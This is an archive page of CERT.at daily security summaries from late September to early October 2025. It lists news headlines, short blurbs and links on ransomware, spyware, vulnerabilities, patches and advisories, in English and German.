- Daily - CERT.at

Tageszusammenfassung - 03.10.2025
by Daily end-of-shift report 03 Oct '25

03 Oct '25

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 02-10-2025 18:00 − Freitag 03-10-2025 18:00 Handler: Guenes Holler Co-Handler: Felician Fuchs ===================== = News = ===================== ∗∗∗ Oracle links Clop extortion attacks to July 2025 vulnerabilities ∗∗∗ --------------------------------------------- Oracle has linked an ongoing extortion campaign claimed by the Clop ransomware gang to E-Business Suite (EBS) vulnerabilities that were patched in July 2025. --------------------------------------------- https://www.bleepingcomputer.com/news/security/oracle-links-clop-extortion-… ∗∗∗ CommetJacking attack tricks Comet browser into stealing emails ∗∗∗ --------------------------------------------- A new attack called CometJacking exploits URL parameters to pass to Perplexitys Comet AI browser hidden instructions that allow access to sensitive data from connected services, like email and calendar. --------------------------------------------- https://www.bleepingcomputer.com/news/security/commetjacking-attack-tricks-… ∗∗∗ Sicherheitslücke in Zahnarztpraxen-System ∗∗∗ --------------------------------------------- Bei einem von einigen Zahnarztpraxen eingesetzten Praxisverwaltungssystem hat es gravierende Schwachstellen gegeben - dadurch hätten Patientendaten gelesen und verändert werden können. --------------------------------------------- https://www.golem.de/news/security-sicherheitsluecke-in-zahnarztpraxen-syst… ∗∗∗ Coordinated Grafana Exploitation Attempts on 28 September ∗∗∗ --------------------------------------------- GreyNoise observed a sharp one-day surge of exploitation attempts targeting CVE-2021-43798 — a Grafana path traversal vulnerability that enables arbitrary file reads. All observed IPs are classified as malicious. --------------------------------------------- https://www.greynoise.io/blog/coordinated-grafana-exploitation-attempts ∗∗∗ Its Never Simple Until It Is (Dell UnityVSA Pre-Auth Command Injection CVE-2025-36604) ∗∗∗ --------------------------------------------- Welcome back, and what a week! We’re glad that happened for you and/or sorry that happened to you. It will get better and/or worse, and you will likely survive. Today, we’re walking down the garden path and digging into the archives, publishing our analysis of a vulnerability we discovered and disclosed to Dell in March 2025 within their UnityVSA solution. --------------------------------------------- https://labs.watchtowr.com/its-never-simple-until-it-is-dell-unityvsa-pre-a… ===================== = Vulnerabilities = ===================== ∗∗∗ DrayTek warns of remote code execution bug in Vigor routers ∗∗∗ --------------------------------------------- Networking hardware maker DrayTek released an advisory to warn about a security vulnerability in several Vigor router models that could allow remote, unauthenticated actors to execute perform arbitrary code. --------------------------------------------- https://www.bleepingcomputer.com/news/security/draytek-warns-of-remote-code… ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (idm:DL1), Debian (gegl and haproxy), Fedora (ffmpeg, firefox, freeipa, python-pip, rust-astral-tokio-tar, sqlite, uv, webkitgtk, and xen), Oracle (idm:DL1, ipa, kernel, perl-JSON-XS, and python3), Red Hat (git), SUSE (curl, frr, jupyter-jupyterlab, and libsuricata8_0_1), and Ubuntu (linux-aws, linux-lts-xenial, linux-aws-fips, linux-fips, linux-gcp-fips, linux-azure, linux-azure, linux-azure-6.8, linux-fips, linux-gcp-fips, and linux-intel-iot-realtime, linux-realtime). --------------------------------------------- https://lwn.net/Articles/1040729/ ∗∗∗ CISA Releases Two Industrial Control Systems Advisories ∗∗∗ --------------------------------------------- CISA released two Industrial Control Systems (ICS) advisories on October 2, 2025: ICSA-25-275-01 Raise3D Pro2 Series 3D Printers and ICSA-25-275-02 Hitachi Energy MSM Product. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2025/10/02/cisa-releases-two-indust… ∗∗∗ Critical Splunk Vulnerabilities Expose Platforms to Remote JavaScript Injection and More ∗∗∗ --------------------------------------------- Splunk has disclosed six critical security vulnerabilities impacting multiple versions of both Splunk Enterprise and Splunk Cloud Platform. These Splunk vulnerabilities, collectively highlighting serious weaknesses in Splunk’s web components, could allow attackers to execute unauthorized JavaScript code remotely, access sensitive information, and perform server-side request forgery (SSRF) attacks. --------------------------------------------- https://thecyberexpress.com/critical-splunk-vulnerabilities/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 02.10.2025
by Daily end-of-shift report 02 Oct '25

02 Oct '25

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 01-10-2025 18:00 − Donnerstag 02-10-2025 18:00 Handler: Guenes Holler Co-Handler: Felician Fuchs ===================== = News = ===================== ∗∗∗ That annoying SMS phish you just got may have come from a box like this ∗∗∗ --------------------------------------------- Smishers looking for new infrastructure are getting creative. --------------------------------------------- https://arstechnica.com/security/2025/10/that-annoying-sms-phish-you-just-g… ∗∗∗ Adobe Analytics bug leaked customer tracking data to other tenants ∗∗∗ --------------------------------------------- Adobe is warning its Analytics customers that an ingestion bug caused data from some organizations to appear in the analytics instances of others for approximately one day. --------------------------------------------- https://www.bleepingcomputer.com/news/security/adobe-analytics-bug-leaked-c… ∗∗∗ Clop extortion emails claim theft of Oracle E-Business Suite data ∗∗∗ --------------------------------------------- Mandiant and Google are tracking a new extortion campaign where executives at multiple companies received emails claiming that sensitive data was stolen from their Oracle E-Business Suite systems. --------------------------------------------- https://www.bleepingcomputer.com/news/security/clop-extortion-emails-claim-… ∗∗∗ Android spyware campaigns impersonate Signal and ToTok messengers ∗∗∗ --------------------------------------------- Two new spyware campaigns that researchers call ProSpy and ToSpy lured Android users with fake upgrades or plugins for the Signal and ToTok messaging apps to steal sensitive data. --------------------------------------------- https://www.bleepingcomputer.com/news/security/android-spyware-campaigns-im… ∗∗∗ Shutdown Threatens US Intel Sharing, Cyber Defense ∗∗∗ --------------------------------------------- Lapse of critical information sharing and mass furloughs at CISA are just some of the concerns. --------------------------------------------- https://www.darkreading.com/cyber-risk/shutdown-us-intel-sharing-cyber-defe… ∗∗∗ Datenleck: Schufa-Tochter Bonify bestätigt Sicherheitsvorfall ∗∗∗ --------------------------------------------- Unbekannte erbeuten Identifizierungsdaten von Bonify-Nutzern. Darunter sind auch Ausweisdaten und Fotos. --------------------------------------------- https://www.golem.de/news/datenleck-schufa-tochter-bonify-bestaetigt-sicher… ∗∗∗ 570 GByte Github-Daten: Red Hat meldet Sicherheitsvorfall ∗∗∗ --------------------------------------------- Die Erpressergruppe Crimson Collective ist angeblich im Besitz vertraulicher Kundendaten von Red Hat - und verlangt ein Lösegeld. --------------------------------------------- https://www.golem.de/news/570-gbyte-github-daten-red-hat-meldet-sicherheits… ∗∗∗ New WireTap Attack Extracts Intel SGX ECDSA Key via DDR4 Memory-Bus Interposer ∗∗∗ --------------------------------------------- In yet another piece of research, academics from Georgia Institute of Technology and Purdue University have demonstrated that the security guarantees offered by Intels Software Guard eXtensions (SGX) can be bypassed on DDR4 systems to passively decrypt sensitive data. --------------------------------------------- https://thehackernews.com/2025/10/new-wiretap-attack-extracts-intel-sgx.html ∗∗∗ Malicious PyPI Package soopsocks Infects 2,653 Systems Before Takedown ∗∗∗ --------------------------------------------- Cybersecurity researchers have flagged a malicious package on the Python Package Index (PyPI) repository that claims to offer the ability to create a SOCKS5 proxy service, while also providing a stealthy backdoor-like functionality to drop additional payloads on Windows systems. The deceptive package, named soopsocks, attracted a total of 2,653 downloads before it was taken down. --------------------------------------------- https://thehackernews.com/2025/10/alert-malicious-pypi-package-soopsocks.ht… ∗∗∗ EU funds are flowing into spyware companies, and politicians are demanding answers ∗∗∗ --------------------------------------------- Experts say Commission is ‘fanning the flames’ of the continent’s own Watergate. An arsenal of angry European Parliament members (MEPs) is demanding answers from senior commissioners about why EU subsidies are ending up in the pockets of spyware companies. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2025/10/02/eu_spyware_f… ∗∗∗ ENISA Threat Landscape 2025 ∗∗∗ --------------------------------------------- Through a more threat-centric approach and further contextual analysis, this latest edition of the ENISA Threat Landscape analyses 4875 incidents over a period spanning from 1 July 2024 to 30 June 2025. --------------------------------------------- https://www.enisa.europa.eu/publications/enisa-threat-landscape-2025 ∗∗∗ Meet SpamGPT and MatrixPDF, AI Toolkits Driving Malware Attacks ∗∗∗ --------------------------------------------- Cybersecurity researchers at Varonis have discovered two new plug-and-play cybercrime toolkits, MatrixPDF and SpamGPT. Learn how these AI-powered tools make mass phishing and PDF malware accessible to anyone, redefining online security risks. --------------------------------------------- https://hackread.com/spamgpt-matrixpdf-ai-toolkits-malware-attacks/ ∗∗∗ Malicious ZIP Files Use Windows Shortcuts to Drop Malware ∗∗∗ --------------------------------------------- Cybersecurity firm Blackpoint Cyber reveals a new spear phishing campaign targeting executives. Learn how attackers use fraudulent document ZIPs containing malicious shortcut files, leveraging living off the land tactics, and a unique Anti-Virus check to deliver a custom payload. --------------------------------------------- https://hackread.com/malicious-zip-files-windows-shortcuts-malware/ ∗∗∗ $20 YoLink IoT Gateway Vulnerabilities Put Home Security at Risk ∗∗∗ --------------------------------------------- Four critical zero-day flaws found in the $20 YoLink Smart Hub allow remote physical access, threatening your home security. See the urgent steps you must take now. --------------------------------------------- https://hackread.com/20-yolink-iot-gateway-vulnerabilities-home-security/ ∗∗∗ Confucius Espionage: From Stealer to Backdoor ∗∗∗ --------------------------------------------- The Confucius group is a long-running cyber-espionage actor operating primarily across South Asia. First identified in 2013, the group is believed to have links to state-sponsored operations in the region. --------------------------------------------- https://feeds.fortinet.com/~/925674278/0/fortinet/blogs~Confucius-Espionage… ===================== = Vulnerabilities = ===================== ∗∗∗ Chrome 141: Google schließt schwerwiegende Sicherheitslücken ∗∗∗ --------------------------------------------- Google hat seinen Browser Chrome auf die Version 141 aktualisiert. Das Update beinhaltet den Versionshinweisen zufolge Patches für 21 Sicherheitslücken. Von mindestens zwei Anfälligkeiten geht demnach ein hohes Risiko aus. Sie erlauben unter Umständen das Einschleusen und Ausführen von Schadcode aus der Ferne und innerhalb der Sandbox des Browsers. --------------------------------------------- https://www.golem.de/news/chrome-141-google-schliesst-schwerwiegende-sicher… ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (perl-JSON-XS), Debian (chromium and openssl), Fedora (bird, dnsdist, firefox, mapserver, ntpd-rs, python-nh3, rust-ammonia, skopeo, sqlite, thunderbird, and xen), Oracle (perl-JSON-XS), Red Hat (kernel, kernel-rt, and libvpx), SUSE (afterburn, cairo, docker-stable, firefox, nginx, python-Django, snpguest, and warewulf4), and Ubuntu (libmspack, libxslt, linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iotg, linux-intel-iotg-5.15, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-oracle, linux-raspi, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-5.4, linux-bluefield, linux-gcp, linux-gcp-5.4, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-iot, linux-kvm, linux-raspi, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-6.14, linux-hwe-6.14, linux-realtime, linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp, linux-gcp-4.15, linux-hwe, linux-oracle, linux, linux-aws, linux-gcp, linux-gcp-6.8, linux-gke, linux-gkeop, linux-ibm, linux-ibm-6.8, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux, linux-kvm, linux-aws-fips, linux-fips, linux-gcp-fips, linux-azure, linux-hwe-6.8, linux-kvm, linux-oracle-5.15, linux-oracle-6.14, linux-raspi, linux-raspi-realtime, linux-realtime, linux-realtime-6.8, linux-realtime-6.14, and python-django). --------------------------------------------- https://lwn.net/Articles/1040591/ ∗∗∗ Stand-alone Security Patch Available for Tenable Security Center versions 6.5.1 and 6.6.0 ∗∗∗ --------------------------------------------- Tenable has released Security Center Patch SC-202509.2.1 to address these issues. --------------------------------------------- https://www.tenable.com/security/tns-2025-20 ∗∗∗ Sicherheitspatches: OpenSSL für Schadcode-Attacken anfällig ∗∗∗ --------------------------------------------- In aktuellen OpenSSL-Versionen haben die Entwickler drei Sicherheitslücken geschlossen. Bislang gibt es keine Berichte zu Attacken. --------------------------------------------- https://www.heise.de/news/OpenSSL-Angreifer-koennen-auf-ARM-Systemen-privat… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 01.10.2025
by Daily end-of-shift report 01 Oct '25

01 Oct '25

===================== = End-of-Day report = ===================== Timeframe: Dienstag 30-09-2025 18:00 − Mittwoch 01-10-2025 18:00 Handler: Guenes Holler Co-Handler: Alexander Riepl ===================== = News = ===================== ∗∗∗ China Imposes One-Hour Reporting Rule for Major Cyber Incidents ∗∗∗ --------------------------------------------- The sweeping new regulations show that Chinas serious about hardening its own networks after launching widespread attacks on global networks. --------------------------------------------- https://www.darkreading.com/cybersecurity-operations/china-one-hour-reporti… ∗∗∗ MatrixPDF: Neues Hacker-Tool macht PDF-Dateien zu Phishing-Ködern ∗∗∗ --------------------------------------------- Schädliche PDF-Dateien lassen sich damit so gestalten, dass sie den Phishing-Filter von Gmail umgehen. --------------------------------------------- https://www.golem.de/news/matrixpdf-neues-hacker-tool-macht-pdf-dateien-zu-… ∗∗∗ New Android Banking Trojan “Klopatra” Uses Hidden VNC to Control Infected Smartphones ∗∗∗ --------------------------------------------- A previously undocumented Android banking trojan called Klopatra has compromised over 3,000 devices, with a majority of the infections reported in Spain and Italy.Italian fraud prevention firm Cleafy, which discovered the sophisticated malware .. --------------------------------------------- https://thehackernews.com/2025/10/new-android-banking-trojan-klopatra.html ∗∗∗ Hackers Exploit Milesight Routers to Send Phishing SMS to European Users ∗∗∗ --------------------------------------------- Unknown threat actors are abusing Milesight industrial cellular routers to send SMS messages as part of a smishing campaign targeting users in European countries since at least February 2022.French cybersecurity company SEKOIA said the attackers are exploiting .. --------------------------------------------- https://thehackernews.com/2025/10/hackers-exploit-milesight-routers-to.html ∗∗∗ Red Hat OpenShift AI Flaw Exposes Hybrid Cloud Infrastructure to Full Takeover ∗∗∗ --------------------------------------------- A severe security flaw has been disclosed in the Red Hat OpenShift AI service that could allow attackers to escalate privileges and take control of the complete infrastructure under certain conditions.OpenShift AI is a platform for managing the lifecycle .. --------------------------------------------- https://thehackernews.com/2025/10/critical-red-hat-openshift-ai-flaw.html ∗∗∗ OneLogin Bug Let Attackers Use API Keys to Steal OIDC Secrets and Impersonate Apps ∗∗∗ --------------------------------------------- A high-severity security flaw has been disclosed in the One Identity OneLogin Identity and Access Management (IAM) solution that, if successfully exploited, could expose sensitive OpenID Connect (OIDC) application client secrets under certain .. --------------------------------------------- https://thehackernews.com/2025/10/onelogin-bug-let-attackers-use-api-keys.h… ∗∗∗ Neue Phishing-Wellen im Namen der WKO ∗∗∗ --------------------------------------------- Kriminelle versuchen aktuell über zwei Maschen im Namen der Wirtschaftskammer Österreich für Schaden zu sorgen. Dabei geht es um die Aktualisierung von Unternehmensdaten und Zahlungsinformationen zum Mitgliedsbeitrag. Besonders gefährlich: Für .. --------------------------------------------- https://www.watchlist-internet.at/news/phishing-wellen-wko/ ∗∗∗ TOTOLINK X6000R: Three New Vulnerabilities Uncovered ∗∗∗ --------------------------------------------- Researchers identified vulnerabilities in TOTOLINK X6000R routers: CVE-2025-52905, CVE-2025-52906 and CVE-2025-52907. We discuss root cause and impact. --------------------------------------------- https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/ ∗∗∗ North Korea IT worker scheme expanding to more industries, countries outside of US tech sector ∗∗∗ --------------------------------------------- Okta said their new research into the scheme revealed that North Korea has honed its skills on U.S.-based companies and has expanded into dozens of different countries and industries. --------------------------------------------- https://therecord.media/north-korea-it-worker-scheme-expands-outisde-us-tech ∗∗∗ Detour Dog’s DNS Hijacking Infects 30,000 Websites with Strela Stealer ∗∗∗ --------------------------------------------- Infoblox reveals how the Detour Dog group used server-side DNS to compromise 30,000+ sites across 89 countries, installing the stealthy Strela Stealer malware. --------------------------------------------- https://hackread.com/detour-dog-dns-hijacking-websites-strela-stealer/ ∗∗∗ Sicherheitsupdate: Schadcode-Lücke bedroht NAS-Modelle von Western Digital ∗∗∗ --------------------------------------------- Angreifer können bestimmte Netzwerkspeicher von Western Digital mit My Cloud OS attackieren. --------------------------------------------- https://heise.de/-10696726 ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (kernel, kernel-rt, mysql:8.0, and openssh), Debian (libcommons-lang-java, libcommons-lang3-java, libcpanel-json-xs-perl, libjson-xs-perl, libxml2, open-vm-tools, and u-boot), Fedora (bird, dnsdist, mapserver, ntpd-rs, python-nh3, and rust-ammonia), Oracle (kernel and mysql:8.0), Red Hat (cups, postgresql:12, and postgresql:13), SUSE (cJSON-devel, gimp, kernel-devel, kubecolor, open-vm-tools, openssl-1_1, openssl-3, and ruby3.4-rubygem-rack), .. --------------------------------------------- https://lwn.net/Articles/1040375/ ∗∗∗ CISA Releases Ten Industrial Control Systems Advisories ∗∗∗ --------------------------------------------- CISA released ten Industrial Control Systems (ICS) advisories on September 30, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.ICSA-25-273-01 MegaSys Enterprises Telenium Online Web ApplicationICSA-25-273-02 Festo SBRD-Q/SBOC-Q/SBOI-QICSA-25-273-03 Festo CPX-CEC-C1 and .. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2025/09/30/cisa-releases-ten-indust… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 30.09.2025
by Daily end-of-shift report 30 Sep '25

30 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Montag 29-09-2025 18:00 − Dienstag 30-09-2025 18:00 Handler: n/a Co-Handler: Guenes Holler ===================== = News = ===================== ∗∗∗ Ransomware gang sought BBC reporter’s help in hacking media giant ∗∗∗ --------------------------------------------- Threat actors claiming to represent the Medusa ransomware gang tempted a BBC correspondent to become an insider threat by offering a significant amount of money. --------------------------------------------- https://www.bleepingcomputer.com/news/security/ransomware-gang-sought-bbc-r… ∗∗∗ AI-Powered Voice Cloning Raises Vishing Risks ∗∗∗ --------------------------------------------- A researcher-developed framework could enable attackers to conduct real-time conversations using simulated audio to compromise organizations and extract sensitive information. --------------------------------------------- https://www.darkreading.com/cyberattacks-data-breaches/ai-voice-cloning-vis… ∗∗∗ Researchers Disclose Google Gemini AI Flaws Allowing Prompt Injection and Cloud Exploits ∗∗∗ --------------------------------------------- Cybersecurity researchers have disclosed three now-patched security vulnerabilities impacting Googles Gemini artificial intelligence (AI) assistant that, if successfully exploited, could have exposed users to major privacy risks and data theft. --------------------------------------------- https://thehackernews.com/2025/09/researchers-disclose-google-gemini-ai.html ∗∗∗ Google’s Latest AI Ransomware Defense Only Goes So Far ∗∗∗ --------------------------------------------- Google has launched a new AI-based protection in Drive for desktop that can shut down an attack before it spreads—but its benefits have their limits. --------------------------------------------- https://www.wired.com/story/googles-latest-ai-ransomware-defense-only-goes-… ∗∗∗ Auf GitHub: Zahlreiche Fakes bekannter Mac-Apps kursieren ∗∗∗ --------------------------------------------- In einer offenbar konzertierten Aktion versuchen Scammer, gefälschte Apps für Mac-Nutzer zu verbreiten. Unklar ist, was das bezwecken soll. --------------------------------------------- https://www.heise.de/news/Auf-GitHub-Zahlreiche-Fakes-bekannter-Mac-Apps-ku… ∗∗∗ Vorsicht vor Festnetz-Spoofing: Kriminelle nutzen (teilweise) reale Telefonnummern! ∗∗∗ --------------------------------------------- Wer aktuell Anrufe von vermeintlichen Bank-Berater:innen bekommt, sollte besonders misstrauisch und vorsichtig sein! Kriminellen gelingt es immer öfter, real existierende Service-Festnetznummern als Deckmantel für ihre Betrugsmaschen zu nutzen. Ziel des „Spoofings“ ist der Zugriff auf das Konto des Opfers. --------------------------------------------- https://www.watchlist-internet.at/news/vorsich-festnetz-spoofing/ ∗∗∗ Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite ∗∗∗ --------------------------------------------- Phantom Taurus is a previously undocumented Chinese threat group. Explore how this groups distinctive toolset lead to uncovering their existence.The post Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite appeared first on Unit 42. --------------------------------------------- https://unit42.paloaltonetworks.com/phantom-taurus/ ∗∗∗ XiebroC2 Identified in MS-SQL Server Attack Cases ∗∗∗ --------------------------------------------- AhnLab SEcurity intelligence Center (ASEC) monitors attacks targeting poorly managed MS-SQL servers and recently confirmed a case involving the use of XiebroC2. XiebroC2 is a C2 framework with open-source code that supports various features such as information collection, remote control, and defense evasion, similar to CobaltStrike. --------------------------------------------- https://asec.ahnlab.com/en/90369/ ∗∗∗ Cybercrime Observations from the Frontlines: UNC6040 Proactive Hardening Recommendations ∗∗∗ --------------------------------------------- Protecting software-as-a-service (SaaS) platforms and applications requires a comprehensive security strategy. Drawing from analysis of UNC6040’s specific attack methodologies, this guide presents a structured defensive framework encompassing proactive hardening measures, comprehensive logging protocols, and advanced detection capabilities. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/unc6040-proactive-… ∗∗∗ When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise ∗∗∗ --------------------------------------------- In early 2025, we encountered a mission-critical software component called TRUfusion Enterprise on the perimeter of one of our customers that is used to transfer highly sensitive data. Since Rocket Software claims that they are undergoing regular audits and also follow secure coding guidelines, we didn’t expect to find much but to our surprise, it took us just two minutes to discover the first totally unsophisticated, but critical pre-auth path traversal vulnerability that already gave us admin rights. --------------------------------------------- https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth… ===================== = Vulnerabilities = ===================== ∗∗∗ Broadcom fixes high-severity VMware NSX bugs reported by NSA ∗∗∗ --------------------------------------------- Broadcom has released security updates to patch two high-severity VMware NSX vulnerabilities reported by the U.S. National Security Agency (NSA). --------------------------------------------- https://www.bleepingcomputer.com/news/security/broadcom-fixes-high-severity… ∗∗∗ IBM App Connect Enterprise Toolkit kann Daten leaken ∗∗∗ --------------------------------------------- Es sind wichtige Sicherheitsupdates für IBM App Connect Enterprise Toolkit, InfoSphere und WebSphere erschienen. --------------------------------------------- https://www.heise.de/news/IBM-App-Connect-Enterprise-Toolkit-kann-Daten-lea… ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (python-internetarchive and tiff), Fedora (nextcloud), Oracle (kernel, openssh, and squid), Red Hat (kernel, kernel-rt, and ncurses), SUSE (afterburn and chromium), and Ubuntu (open-vm-tools, ruby-rack, and tiff). --------------------------------------------- https://lwn.net/Articles/1040152/ ∗∗∗ Security Vulnerabilities fixed in Firefox 143.0.3 ∗∗∗ --------------------------------------------- Mozilla has fixed three vulnerabilities labeled as high. --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/mfsa2025-80/ ∗∗∗ Critical Vulnerability Alert: CVE-2025-10035 in GoAnywhere MFT ∗∗∗ --------------------------------------------- A critical security vulnerability (CVE-2025-10035) has been identified in GoAnywhere MFT, a widely used file transfer solution developed by Fortra. --------------------------------------------- https://www.bitsight.com/blog/critical-vulnerability-alert-cve-2025-10035-g… ∗∗∗ Apple Security Update Addresses Critical Font Parser Vulnerability Across Multiple Platforms ∗∗∗ --------------------------------------------- Apple has rolled out a series of important security updates across multiple platforms, addressing a vulnerability affecting the system font parser. These Apple security updates cover iOS, iPadOS, macOS, visionOS, watchOS, and tvOS. --------------------------------------------- https://thecyberexpress.com/apple-security-updates/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 29.09.2025
by Daily end-of-shift report 29 Sep '25

29 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Freitag 26-09-2025 18:00 − Montag 29-09-2025 18:00 Handler: Guenes Holler Co-Handler: Felician Fuchs ===================== = News = ===================== ∗∗∗ First Malicious MCP in the Wild: The Postmark Backdoor Thats Stealing Your Emails ∗∗∗ --------------------------------------------- This is the world’s first sighting of a real world malicious MCP server. The attack surface for endpoint supply chain attacks is slowly becoming the enterprise’s biggest attack surface. --------------------------------------------- https://www.koi.security/blog/postmark-mcp-npm-malicious-backdoor-email-the… ∗∗∗ Akira ransomware breaching MFA-protected SonicWall VPN accounts ∗∗∗ --------------------------------------------- Ongoing Akira ransomware attacks targeting SonicWall SSL VPN devices continue to evolve, with the threat actors found to be successfully logging in despite OTP MFA being enabled on accounts. Researchers suspect that this may be achieved through the use of previously stolen OTP seeds, although the exact method remains unconfirmed. --------------------------------------------- https://www.bleepingcomputer.com/news/security/akira-ransomware-breaching-m… ∗∗∗ Pointer leaks through pointer-keyed data structures ∗∗∗ --------------------------------------------- Some time in 2024, during a Project Zero team discussion, we were talking about how remote ASLR leaks would be helpful or necessary for exploiting some types of memory corruption bugs, specifically in the context of Apple devices. --------------------------------------------- https://googleprojectzero.blogspot.com/2025/09/pointer-leaks-through-pointe… ∗∗∗ Microsoft Flags AI-Driven Phishing: LLM-Crafted SVG Files Outsmart Email Security ∗∗∗ --------------------------------------------- Microsoft is calling attention to a new phishing campaign primarily aimed at U.S.-based organizations that has likely utilized code generated using large language models (LLMs) to obfuscate payloads and evade security defenses. "Appearing to be aided by a large language model (LLM), the activity obfuscated its behavior within an SVG file, leveraging business terminology and a synthetic structure to disguise its malicious intent," the Microsoft Threat Intelligence team said in an analysis published last week. --------------------------------------------- https://thehackernews.com/2025/09/microsoft-flags-ai-driven-phishing-llm.ht… ∗∗∗ Cyber threat-sharing law set to shut down, along with US government ∗∗∗ --------------------------------------------- Barring a last-minute deal, the US federal government would shut down on Wednesday, October 1, and the 2015 Cybersecurity Information Sharing Act would lapse at the same time, threatening what many consider a critical plank of US cybersecurity policy. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2025/09/26/government_s… ∗∗∗ Sex offenders, terrorists, drug dealers, exposed in spyware breach ∗∗∗ --------------------------------------------- RemoteCOMs monitoring software leaked the personal details of suspects, offenders, and the law enforcement officers tracking them. --------------------------------------------- https://www.malwarebytes.com/blog/news/2025/09/sex-offenders-terrorists-dru… ∗∗∗ From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion ∗∗∗ --------------------------------------------- The intrusion took place in May 2024, when a user executed a malicious JavaScript file. This Javascipt file has been previously reported as associated with the Lunar Spider initial access group by EclecticIQ. The heavily obfuscated file, masquerading as a legitimate tax form, contained only a small amount of executable code dispersed among extensive filler content used for evasion. The JavaScript payload triggered the download of a MSI package, which deployed a Brute Ratel DLL file using rundll32. --------------------------------------------- https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-e… ∗∗∗ Medusa Ransomware Claims Comcast Data Breach, Demands $1.2M ∗∗∗ --------------------------------------------- Medusa ransomware group claims 834 GB data theft from Comcast, demanding $1.2M ransom while sharing screenshots and file listings. --------------------------------------------- https://hackread.com/medusa-ransomware-comcast-data-breach/ ∗∗∗ CISA and UK NCSC Release Joint Guidance for Securing OT Systems ∗∗∗ --------------------------------------------- CISA, in collaboration with the Federal Bureau of Investigation, the United Kingdom’s National Cyber Security Centre, and other international partners has released new joint cybersecurity guidance: [Creating and Maintaining a Definitive View of Your Operational Technology (OT) Architecture]. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2025/09/29/cisa-and-uk-ncsc-release… ∗∗∗ Supply chain security for the 0.001% (and why it won’t catch on) ∗∗∗ --------------------------------------------- After yet another supply chain issue (npm this time, but it doesn’t really matter that much), Shai-hulud, 500 packages affected and millions of downloads later, I finally wrapped up the protection system for my dev environment. I really don’t want to be the next one exploited. --------------------------------------------- https://blog.viraptor.info/post/supply-chain-security-for-the-0001-and-why-… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (avahi, cups, firefox, gnutls, golang, httpd, kernel, libtpms, mysql, opentelemetry-collector, php:8.2, podman, postgresql:13, postgresql:15, python3, python3.11, python3.12, python3.9, thunderbird, and udisks2), Debian (firefox-esr, gimp, nncp, node-tar-fs, and squid), Fedora (chromium, firebird, python-azure-keyvault-securitydomain, python-azure-mgmt-security, and python-microsoft-security-utilities-secret-masker), Red Hat (httpd:2.4, kernel, kernel-rt, and mod_http2), SUSE (aide, apache2-mod_security2, chromedriver, cloud-init, docker, gdk-pixbuf, git, google-osconfig-agent, govulncheck-vulndb, gstreamer-plugins-base, iperf, kernel, krb5, krita, luajit, net-tools, nvidia-open-driver-G06-signed, pam, postgresql17, python311, rust-keylime, sevctl, tor, tree-sitter-ruby, and udisks2), and Ubuntu (curl, ghostscript, inetutils, python2.7, and qtbase-opensource-src). --------------------------------------------- https://lwn.net/Articles/1040058/ ∗∗∗ REDCap: Multiple Cross-Site Scripting (XSS) Vulnerabilities ∗∗∗ --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/redcap-mult… ∗∗∗ DataSpider Servista improper restriction of XML external entity references ∗∗∗ --------------------------------------------- https://jvn.jp/en/jp/JVN23423519/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 26.09.2025
by Daily end-of-shift report 26 Sep '25

26 Sep '25

